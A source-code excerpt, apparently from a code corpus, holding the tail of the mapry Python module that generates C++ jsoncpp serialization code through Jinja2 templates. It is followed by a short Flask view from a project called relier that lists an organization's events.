const rep_t nanoseconds_in_day = 86400L*1000L*1000L*1000L;
const rep_t days = abscount / nanoseconds_in_day;
rep_t rest = abscount % nanoseconds_in_day;
const rep_t nanoseconds_in_hour = 3600L*1000L*1000L*1000L;
const rep_t hours = rest / nanoseconds_in_hour;
rest = rest % nanoseconds_in_hour;
const rep_t nanoseconds_in_minute = 60L*1000L*1000L*1000L;
const rep_t minutes = rest / nanoseconds_in_minute;
rest = rest % nanoseconds_in_minute;
const rep_t nanoseconds_in_second = 1000L*1000L*1000L;
const rep_t seconds = rest / nanoseconds_in_second;
rest = rest % nanoseconds_in_second;
const rep_t nanoseconds = rest;
std::stringstream ss;
if (d.count() < 0) {
ss << "-";
}
ss << "P";
if(days > 0) {
ss << days << "D";
}
if(hours > 0 or minutes > 0 or
seconds > 0 or nanoseconds > 0) {
ss << "T";
if(hours > 0) {
ss << hours << "H";
}
if(minutes > 0) {
ss << minutes << "M";
}
if(nanoseconds == 0) {
if(seconds > 0) {
ss << seconds << "S";
}
} else {
std::stringstream ssnano;
ssnano << std::setfill('0') << std::setw(9) << nanoseconds;
const std::string nanos_str = ssnano.str();
// Nag trailing zeros
size_t i = nanos_str.size() - 1;
for(; i >= 0; --i) {
if (nanos_str.at(i) != '0') {
break;
}
}
ss << seconds << "." << nanos_str.substr(0, i + 1) << "S";
}
}
return ss.str();
}''')
_SERIALIZE_CTIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{% if dt_format %}
{{ target_expr }} = tm_to_string(
{{ value_expr }},
{{ dt_format|escaped_str }});
{% else %}
{{ target_expr }} = "";
{% endif %}{# /if dt_format #}
''')
_SERIALIZE_DATE_TIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{% if dt_format %}
{{ target_expr }} = date::format(
{{ dt_format|escaped_str }},
{{ value_expr }});
{% else %}
{{ target_expr }} = "";
{% endif %}{# /if dt_format #}
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_date_time(
target_expr: str, value_expr: str,
a_type: Union[mapry.Date, mapry.Datetime], cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize a date/datetime.
The code serializes the ``value_expr`` into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param a_type: the mapry type of the value
:param cpp: C++ settings
:return: generated serialization code
"""
if cpp.datetime_library == 'ctime':
return _SERIALIZE_CTIME_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
dt_format=a_type.format).rstrip()
if cpp.datetime_library == 'date.h':
return _SERIALIZE_DATE_TIME_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
dt_format=a_type.format).rstrip()
raise NotImplementedError(
"Unhandled datetime library: {}".format(cpp.datetime_library))
_SERIALIZE_TIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{% if dt_format %}
{{ target_expr }} = date::format(
{{ dt_format|escaped_str }},
{{ value_expr }}.to_duration());
{% else %}
{{ target_expr }} = "";
{% endif %}{# /if dt_format #}
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_time(
target_expr: str, value_expr: str, a_type: mapry.Time,
cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize a time zone.
The code serializes the ``value_expr`` into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param a_type: the mapry type of the value
:param cpp: C++ settings
:return: generated serialization code
"""
if cpp.datetime_library == 'ctime':
return _SERIALIZE_CTIME_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
dt_format=a_type.format).rstrip()
if cpp.datetime_library == 'date.h':
return _SERIALIZE_TIME_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
dt_format=a_type.format).rstrip()
raise NotImplementedError(
"Unhandled datetime library: {}".format(cpp.datetime_library))
@ensure(lambda result: not result.endswith('\n'))
def _serialize_time_zone(
target_expr: str, value_expr: str, cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize a time zone.
The code serializes the ``value_expr`` into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param cpp: C++ settings
:return: generated serialization code
"""
if cpp.datetime_library == 'ctime':
return '{} = {};'.format(target_expr, value_expr)
if cpp.datetime_library == 'date.h':
return '{} = {}->name();'.format(target_expr, value_expr)
raise NotImplementedError(
"Unhandled datetime library: {}".format(cpp.datetime_library))
_SERIALIZE_ARRAY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
Json::Value target_{{ uid }}(Json::arrayValue);
const auto& vector_{{ uid }} = {{ value_expr }};
for (int i_{{ uid }} = 0;
i_{{ uid }} < vector_{{ uid }}.size();
++i_{{ uid }}) {
{{ item_serialization|indent }}
}
{{ target_expr }} = std::move(target_{{ uid }});
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_array(
target_expr: str, value_expr: str, a_type: mapry.Array,
auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize an array.
The code serializes the ``value_expr`` into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param a_type: the mapry type of the value
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated serialization code
"""
uid = auto_id.next_identifier()
item_serialization = _serialize_value(
target_expr="target_{uid}[i_{uid}]".format(uid=uid),
value_expr="vector_{uid}[i_{uid}]".format(uid=uid),
a_type=a_type.values,
auto_id=auto_id,
cpp=cpp)
return _SERIALIZE_ARRAY_TPL.render(
uid=uid,
value_expr=value_expr,
item_serialization=item_serialization,
target_expr=target_expr)
_SERIALIZE_MAP_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
Json::Value target_{{ uid }}(Json::objectValue);
const auto& map_{{ uid }} = {{ value_expr }};
for (const auto& kv_{{ uid }} : map_{{ uid }}) {
{{ item_serialization|indent }}
}
{{ target_expr }} = std::move(target_{{ uid }});
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_map(
target_expr: str, value_expr: str, a_type: mapry.Map, auto_id: _AutoID,
cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize a map.
The code serializes the ``value_expr`` into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param a_type: the mapry type of the value
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated serialization code
"""
uid = auto_id.next_identifier()
item_serialization = _serialize_value(
target_expr="target_{uid}[kv_{uid}.first]".format(uid=uid),
value_expr="kv_{uid}.second".format(uid=uid),
a_type=a_type.values,
auto_id=auto_id,
cpp=cpp)
return _SERIALIZE_MAP_TPL.render(
uid=uid,
value_expr=value_expr,
item_serialization=item_serialization,
target_expr=target_expr)
@ensure(lambda result: not result.endswith('\n'))
def _serialize_value(
target_expr: str, value_expr: str, a_type: mapry.Type, auto_id: _AutoID,
cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize the ``value_expr`` into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param a_type: the mapry type of the value
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated serialization code
"""
result = ''
if isinstance(a_type,
(mapry.Boolean, mapry.Integer, mapry.Float, mapry.String)):
result = '{} = {};'.format(target_expr, value_expr)
elif isinstance(a_type, mapry.Path):
result = "{} = {}.string();".format(target_expr, value_expr)
elif isinstance(a_type, (mapry.Date, mapry.Datetime)):
result = _serialize_date_time(
target_expr=target_expr,
value_expr=value_expr,
a_type=a_type,
cpp=cpp)
elif isinstance(a_type, mapry.Time):
result = _serialize_time(
target_expr=target_expr,
value_expr=value_expr,
a_type=a_type,
cpp=cpp)
elif isinstance(a_type, mapry.TimeZone):
result = _serialize_time_zone(
target_expr=target_expr, value_expr=value_expr, cpp=cpp)
elif isinstance(a_type, mapry.Duration):
result = '{} = duration_to_string({});'.format(target_expr, value_expr)
elif isinstance(a_type, mapry.Array):
result = _serialize_array(
target_expr=target_expr,
value_expr=value_expr,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Map):
result = _serialize_map(
target_expr=target_expr,
value_expr=value_expr,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Class):
result = "{} = {}->id;".format(target_expr, value_expr)
elif isinstance(a_type, mapry.Embed):
result = "{} = serialize_{}({});".format(
target_expr, mapry.cpp.naming.as_variable(a_type.name), value_expr)
else:
raise NotImplementedError(
"Unhandled serialization of type: {}".format(a_type))
return result
_SERIALIZE_OPTIONAL_PROPERTY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
if ({{ value_expr }}) {
{{ serialization|indent }}
}
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_property(
target_expr: str, value_expr: str, a_property: mapry.Property,
auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to serialize the property.
The value as the property is given as ``value_expr`` and serialized
into the ``target_expr``.
:param target_expr: C++ expression of the Json::Value to be set
:param value_expr: C++ expression of the value to be serialized
:param a_property: the property definition
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated serialization code
"""
if not a_property.optional:
return _serialize_value(
target_expr=target_expr,
value_expr=value_expr,
a_type=a_property.type,
auto_id=auto_id,
cpp=cpp)
##
# Handle optional property
##
deref_value_expr = "(*{})".format(value_expr)
serialization = _serialize_value(
target_expr=target_expr,
value_expr=deref_value_expr,
a_type=a_property.type,
auto_id=auto_id,
cpp=cpp)
return _SERIALIZE_OPTIONAL_PROPERTY_TPL.render(
value_expr=value_expr, serialization=serialization)
_SERIALIZE_CLASS_OR_EMBED_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
Json::Value serialize_{{ composite.name|as_variable }}(
const {{ composite.name|as_composite }}& {{
composite.name|as_variable }}) {
{% set value = "%s_as_value"|format(composite.name|as_variable) %}
{% if property_serializations %}
Json::Value {{ value }};
{% for serialization in property_serializations %}
{{ serialization|indent }}
{% endfor %}
return {{ value }};
{% else %}
return Json::objectValue;
{% endif %}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_class_or_embed(
class_or_embed: Union[mapry.Class, mapry.Embed], cpp: mapry.Cpp) -> str:
"""
Generate the function to serialize a class or an embeddable structure.
:param embed: a mapry definition of the class or the embeddable structure
:param cpp: C++ settings
:return: generated code
"""
value_expr = mapry.cpp.naming.as_variable(class_or_embed.name)
auto_id = _AutoID()
# yapf: disable
property_serializations = [
_serialize_property(
target_expr="{}_as_value[{}]".format(
mapry.cpp.naming.as_variable(class_or_embed.name),
mapry.cpp.generate.escaped_str(prop.json)),
value_expr="{}.{}".format(value_expr, prop.name),
a_property=prop,
auto_id=auto_id,
cpp=cpp)
for prop in class_or_embed.properties.values()
]
# yapf: enable
return _SERIALIZE_CLASS_OR_EMBED_TPL.render(
composite=class_or_embed,
property_serializations=property_serializations)
_SERIALIZE_GRAPH_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
Json::Value serialize_{{ graph.name|as_variable }}(
const {{ graph.name|as_composite }}& {{ graph.name|as_variable }}) {
{% set value = "%s_as_value"|format(graph.name|as_variable) %}
{% if property_serializations or graph.classes %}
Json::Value {{ value }};
{% for serialization in property_serializations %}
{{ serialization|indent }}
{% endfor %}{# /for property_serializations #}
{% for cls in graph.classes.values() %}
if (!{{ graph.name|as_variable }}.{{ cls.plural|as_variable }}.empty()) {
Json::Value {{ cls.plural|as_variable }}_as_value;
for (const auto& kv : {{
graph.name|as_variable }}.{{ cls.plural|as_variable }}) {
const std::string& id = kv.first;
const {{ cls.name|as_composite }}* instance = kv.second.get();
if (id != instance->id) {
constexpr auto expected(
"Expected the class instance of "
{{ cls.name|as_composite|escaped_str }}
"to have the ID ");
constexpr auto but_got(", but got: ");
std::string msg;
msg.reserve(
strlen(expected) + id.size() +
strlen(but_got) + instance->id.size());
msg += expected;
msg += id;
msg += but_got;
msg += instance->id;
throw std::invalid_argument(msg);
}
{{ cls.plural|as_variable }}_as_value[instance->id] = {#
#}serialize_{{ cls.name|as_variable }}(*instance);
}
{{ value }}[{{ cls.plural|json_plural|escaped_str }}] = {{
cls.plural|as_variable }}_as_value;
}
{% endfor %}{# /for cls #}
return {{ value }};
{% else %}{## case no properties nor classes ##}
return Json::objectValue;
{% endif %}{# /if property_serializations or graph.classes #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_graph(graph: mapry.Graph, cpp: mapry.Cpp) -> str:
"""
Generate the implementation of the function that serializes a mapry graph.
:param graph: mapry definition of the object graph
:param cpp: C++ settings
:return: generated code
"""
value_expr = mapry.cpp.naming.as_variable(graph.name)
auto_id = _AutoID()
# yapf: disable
property_serializations = [
_serialize_property(
target_expr="{}_as_value[{}]".format(
mapry.cpp.naming.as_variable(graph.name),
mapry.cpp.generate.escaped_str(prop.json)),
value_expr="{}.{}".format(value_expr, prop.name),
a_property=prop,
auto_id=auto_id,
cpp=cpp)
for prop in graph.properties.values()
]
# yapf: enable
return _SERIALIZE_GRAPH_TPL.render(
graph=graph, property_serializations=property_serializations)
@ensure(lambda result: result.endswith('\n'))
def generate(
graph: mapry.Graph, cpp: mapry.Cpp, types_header_path: str,
parse_header_path: str, jsoncpp_header_path: str) -> str:
"""
Generate the implementation file for de/serialization from/to Jsoncpp.
:param graph: definition of the object graph
:param cpp: C++ settings
:param types_header_path: defines the types of the object graph
:param parse_header_path: defines the general parsing structures
:param jsoncpp_header_path:
defines parsing and serializing functions from/to Jsoncpp
:return: content of the implementation file
"""
##
# Header
##
blocks = [
mapry.cpp.generate.WARNING,
_includes(
graph=graph,
types_header_path=types_header_path,
parse_header_path=parse_header_path,
jsoncpp_header_path=jsoncpp_header_path,
cpp=cpp)
]
namespace_parts = cpp.namespace.split('::')
if namespace_parts:
namespace_opening = '\n'.join([
'namespace {} {{'.format(namespace_part)
for namespace_part in namespace_parts
])
blocks.append(namespace_opening)
blocks.append("namespace jsoncpp {")
##
# Parse
##
blocks.append(_message_function())
regex_constants_text = _regex_constants(graph=graph)
if regex_constants_text != '':
blocks.append(regex_constants_text)
if mapry.needs_type(a_type=graph, query=mapry.Duration):
blocks.append(_duration_from_string())
blocks.append(_value_type_to_string())
blocks.append(_parse_graph(graph=graph, cpp=cpp))
##
# Serialize
##
if cpp.datetime_library == 'ctime':
# yapf: disable
if any(mapry.needs_type(a_type=graph, query=query_type)
for query_type in [mapry.Date, mapry.Time, mapry.Datetime]):
# yapf: enable
blocks.append(_datetime_to_string())
elif cpp.datetime_library == 'date.h':
pass
else:
raise NotImplementedError(
"Unhandled datetime library: {}".format(cpp.datetime_library))
if mapry.needs_type(a_type=graph, query=mapry.Duration):
blocks.append(_duration_to_string())
nongraph_composites = [] # type: List[Union[mapry.Class, mapry.Embed]]
nongraph_composites.extend(graph.classes.values())
nongraph_composites.extend(graph.embeds.values())
for class_or_embed in nongraph_composites:
blocks.append(_parse_composite(composite=class_or_embed, cpp=cpp))
for class_or_embed in nongraph_composites:
blocks.append(
_serialize_class_or_embed(class_or_embed=class_or_embed, cpp=cpp))
blocks.append(_serialize_graph(graph=graph, cpp=cpp))
blocks.append("} // namespace jsoncpp")
##
# Footer
##
if namespace_parts:
# yapf: disable
namespace_closing = '\n'.join(
['}} // namespace {}'.format(namespace_part)
for namespace_part in reversed(namespace_parts)])
# yapf: enable
blocks.append(namespace_closing)
blocks.append(mapry.cpp.generate.WARNING)
text = '\n\n'.join(blocks) + '\n'
return mapry.indention.reindent(text=text, indention=cpp.indention)
| 2.515625 | 3 |
relier/web/views/events.py | citruspi/relier-api | 0 | 12769750 | <filename>relier/web/views/events.py
from relier.web.views import AuthenticatedView
from relier.models import Event
from flask import g, render_template
class Events(AuthenticatedView):
def get(self):
events = Event.select().where(Event.organization == g.user.organization)
if events.count() == 0:
return render_template('get_started.j2')
events.order_by(Event.start_time.desc())
return render_template('events.j2', events=events)
| 1.96875 | 2 |